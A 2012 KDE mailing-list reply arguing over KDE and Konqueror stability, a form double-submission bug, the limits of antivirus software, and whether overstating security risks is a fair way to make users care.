Automated import of camera photos

Duncan 1i5t5.duncan at
Mon Dec 10 21:42:08 GMT 2012

Anne Wilson posted on Mon, 10 Dec 2012 15:15:03 +0000 as excerpted:

> As an example of FUD, this message takes some beating.  Just to deal
> with a few points -

FWIW, I'd definitely agree it's a bit over-the-top-one-sided, but OTOH, 
that's what it can TAKE sometimes, to get people who "just want it to 
work" and don't really /care/ about security, to get the message, and 
START caring, at least enough to stay on something with a bit less chance 
of being a danger to both themselves and others on the net with them.

> KDE is, for the most part, entirely stable - just stay away from

Definitely agree on kdepim, but I'd throw in pretty much the entire 
semantic-desktop in there as well.  Tho YMMV, as they say.  But dE has a 
point.  One big personal example here, the one that finally triggered my 
switch from konqueror to firefox as my default browser, was the so-called 
stable series 4.6.2 konqueror infamous form double-submission bug.  KDE 
has supposedly been ready for ordinary users since 4.2 (tho I'm on record 
as saying late 4.5, the 4.2 claim was pure unadulterated bunk, kde4 was 
still ALPHA back then, as clearly indicated by the bugs where devs were 
saying kde3-stable features weren't yet available in kde4, it wasn't even 
feature-complete yet, the /classic/ definition of alpha!), yet here we 
had the primary browser being broken for TWO so-called stable-series 
"safe to upgrade to" releases.

People in the REAL world use their browser for such things as online 
purchases, banking, etc, where form double-submission could result in 
being billed TWICE for a purchase or online transaction!

Yes, bugs DO happen, even in "stable series".  But with a properly 
supported browser, the fix would have been out in DAYS once the problem 
was public, not MONTHS.  Especially so given that the bad commit was said 
to be quite obviously a commit to stable that only should have gone to 
master, and was easy to pin down and revert.  Yet not only was a 
(or whatever) bump never forthcoming, the fix didn't even make 4.6.3.  It 
was 4.6.4 before a fix finally appeared.

Clearly, if kde4 itself is claimed to be stable, then either the kde and 
specifically konqueror (or kdelibs, IDR/K which) devs are playing 
ENTIRELY irresponsible games with a browser they *KNOW* is being used for 
online banking, etc, OR, they consider konqueror little more than a piece 
of demoware, unfit to be used "in the real world" for online banking, 
etc, in any case.

In a perfect world they'd actually make a public statement one way or the 
other, but I've not seen any such thing here.  However, other evidence 
(such as the entire lack of GUI security cert management for several 
feature releases AFTER kde4 was declared stable, and the fact that many 
kde devs are known from blog comments, etc, to run firefox or chrome/
chromium as their primary browser) suggests that they simply don't 
consider konqueror anything more than a toy.  Once I realized that, I 
switched within days, as I *DO* use my browser for "real life" tasks like 
online banking, etc.

But the lack of that difinitive public statement about konqueror just 
being a "toy" browser, on a platform kde continues to claim is stable, 
fits the developed pattern all too well.  I'm personally actually fine 
with running pre-release software and in fact am running kde-4.10-beta2 
(aka 4.9.90) right now.  But it'd be nice to have it called such, when 
such it is.  Meanwhile, to the extent that I actually rely on things to 
work, the trend here has been clear for some time.  I'm gradually 
switching off of kde for anything I actually depend on to work.  Firefox 
instead of konqueror, anything kdepim at all, the entire semantic-desktop 
is, to the extent possible, opted-out of at build configure time, etc.  
Now, I'm still using the core kde desktop, plasma, kwin, etc, plus games, 
but if games break I can still get into my bank to pay the bills, kwin 
has been remarkably stable for me since I upgraded graphics to support 
it, and plasma and krunner (as well as kwin) as components can be 
restarted if necessary, and have actually been quite stable of late 
(since I quit building kde with semantic-desktop and kdepim support at 
least) as well.

> You recommendation to mislead her on the spam subject is objectionable.
> Antivirus software definitely does work - as long as it is set up to
> receive signature updates regularly.  The reason there are so many
> infected computers is that many people don't use an AV product at all,
> others install one, preferably a free-as-in-beer one, and don't properly
> set up updates.  I know one user who has used Windows daily for 20+
> years and never had a single infection.  Education on key risks is the
> key.

For a decade, until MS pushed me off with eXPrivacy, I was one of those 
people.  However, there's a big word there, EDUCATION.  But behind it 
there's an even bigger concept, ACTUALLY CARING.  Of course, malware 
spreading users aren't the ONLY ones who don't seem to actually CARE, see 
the above about konqueror devs leaving their users with known financial-
transaction-sensitive bugs for months, with no security-bump-update, plus 
the claim that kde (including konqueror) is ordinary user ready, when 
it's lacking security-cert management for YEARS after that claim was 
made, in an age where entire certificate authorities along with 
everything they issued get revoked!

So I guess users get a bit of slack if even the devs can't be bothered to 
CARE about security enough to either code-up or make a public statement 
disavowing the platform's primary browser as fit for anything other than 
a toy.

But, one point is often lost in the AV context.   Signature-based AV 
(where the updates primary update the sigs) is primarily if not 
exclusively retroactive reaction-based.  AV vendors have to have malware 
reported and take it apart in the lab in ordered to develop those 
signatures.  That takes time, and while proper updates can keep detected 
malware from spreading TOO widely, the system is predicated on there 
being SOME victims first, to trigger the initial reports.

And heuristic-based action analysis and prevention anti-malware is 
fraught with false-positives, to the point that it can never be anything 
close to even 90% effective, because either it's turned up to the point 
that it warns about EVERYTHING, and people either turn it off or start 
ignoring it and automatically clicking right thru the warnings (a problem 
MS has clearly had with its own efforts), or it misses enough potentially 
hazardous actions that it's quite possible to work around.

There simply is NO alternative to the REAL solution, getting people to 
ACTUALLY CARE enough so EDUCATION (the word you used) can work.

But human nature, which is what we're up against, is a hard nut to 
crack.  Some people just /don't/ care.  Others, like me with my decade on 
MS before switching, uninfected, and that guy you mentioned with 20 years 
on MS, clearly DO care, and spend significant time and energy on keeping 
up with developments enough to defend themselves.  But we're clearly a 
minority, and prove nothing about the "just don't care" susceptibility of 
an ordinary user on MS.

dE's method of /scaring/ them into caring, at least enough to keep them 
from running MS most of the time, is arguably what it takes in some 
cases, as arguably surface-deceptive as it may be.  I have serious doubts 
as to whether it's particularly effective long-term, but with older 
people who honestly in all likelihood don't /have/ "long term" to worry 
about, or for those (older or not) who are sufficiently uncomfortable 
enough with the whole computer thing to limit their monthly exposure to 
the point where the scare tactic may last long /enough/, it /may/ work.

That's not saying I'd use the tactic myself, but I understand it.  
Meanwhile, if over-stating the issue GETS them to care, even (somewhat) 
short term, perhaps it's simply like deliberately shouting and otherwise 
pretending to be angry simply to get a point across, sometimes it's what 
it takes.  And if the target and others they'd affect are safer for it, 
even relatively short-term, who's to say it's wrong?

But like you, Anne, I'm still uncomfortable enough with the tactic that 
I'm unlikely to use it myself.

> And no, Linux isn't safe from malware.  Safer than Windows, yes, if you
> leave holes in Windows, but an unprotected computer, whichever OS it is
> using, is likely to be compromised sooner or later.

Ultimately, it all comes down to the end user, and how much they actually 
CARE about it.  There's simply no getting around that fact.

In some way's, it's like drunk driving.  At least here in the US, MADD/
SADD and other efforts have finally seemed to have some effect, according 
to recent studies.  Even among the drinking/partying set, there's now 
relatively strong PEER pressure, in addition to LEGAL pressure, to have a 
designated driver who does NOT drink, and at parties, a keymaster, whose 
responsibility it is to take driver's keys and keep them safe during the 
party, and give them back only to a taxi driver if he judges the key 
owner unfit to drive.

(Well OT but with the recent state pot legalization, with Washington's 
law specifically setup to handle driving while intoxicated with pot 
similar to the way they deal with drunk driving, likely kicks off an era 
when we see the laws evolve to handle other drugs similar to the way 
alcohol is handled, driving-wise.  Of course some states already do that 
to some extent, and that in fact has been one of the arguments behind 
drug legalization as well, there's better control over drunk driving, 
BECAUSE alcohol is legal and the laws have been allowed to evolve to deal 
with it, than illegal drugs, where such developments really haven't had a 
chance to properly evolve due to the illegality of the drugs in the first 

Ultimately, just as with drunk driving, as long as people simply get a 
slap on the wrist and simply told to be good boys/girls now and not do it 
again, a lot of people SIMPLY WILL NOT CARE.  It's only when the 
consequences become drastic enough, both from a legal and peer 
perspective, that these people care, and society's actions as a whole 
begin to change.

Arguably, overstating the risks of NOT CARING is a way of motivating the 
desired changes.  As with alcohol and drugs, the chances of it working 
long term over the general population are nill.  Behavior as a system 
won't change until the acceptance of that system to said behavior 
changes.  But if there's someone you care about, scaring them into 
compliance /might/ work... long enough.  OTOH, there's significant risk 
of it backfiring, too, if they ever figure out that you simply scared 
them into compliance, and thus discount the truth of even the valid 
statements, due to the demonstrated overstatements.  Oh, well...

But what worries me is people who get the wrong idea that Linux IS 
invulnerable, and thus see it as a panacea for actual CARING about 
security, believing that if they run Linux, they don't HAVE to care.  
THAT is what SCARES me!

Because as you said, given someone who doesn't care (or a sufficiently 
high target profile from the attacker's perspective), no (real-world 
general-purpose) OS is invulnerable.  All will fall, sooner or later.  
The only way to avoid that is to CARE enough to take the time to educate 
yourself and to act on what you learn.  And ultimately, part of what you 
learn is simply how to keep your attack profile and ease of successful 
attack low enough that there's always someone else that's easier to 
attack, for the given reward it'd bring.  People who are juicier targets 
thus have to have correspondingly stronger defenses, while the ordinary 
user simply has to ensure that the doors are locked and the valuables out 
of sight, as they say.  And arguably, it /is/ true that locking those 
doors and keeping those valuables out of sight is easier on Linux, but 
that doesn't make it impossible to lock them and keep the valuables out 
of sight on MS.  It just lowers an individual's attack profile a bit, 
good as part of a larger solution which by definition must include CARING 
about the problem in the first place, but not sufficient in and of itself.

Duncan - List replies preferred.   No HTML msgs.
"Every nonfree program has a lord, a master --
and if you use the program, he is your master."  Richard Stallman

This message is from the kde mailing list.
Account management:
More info:

More information about the kde mailing list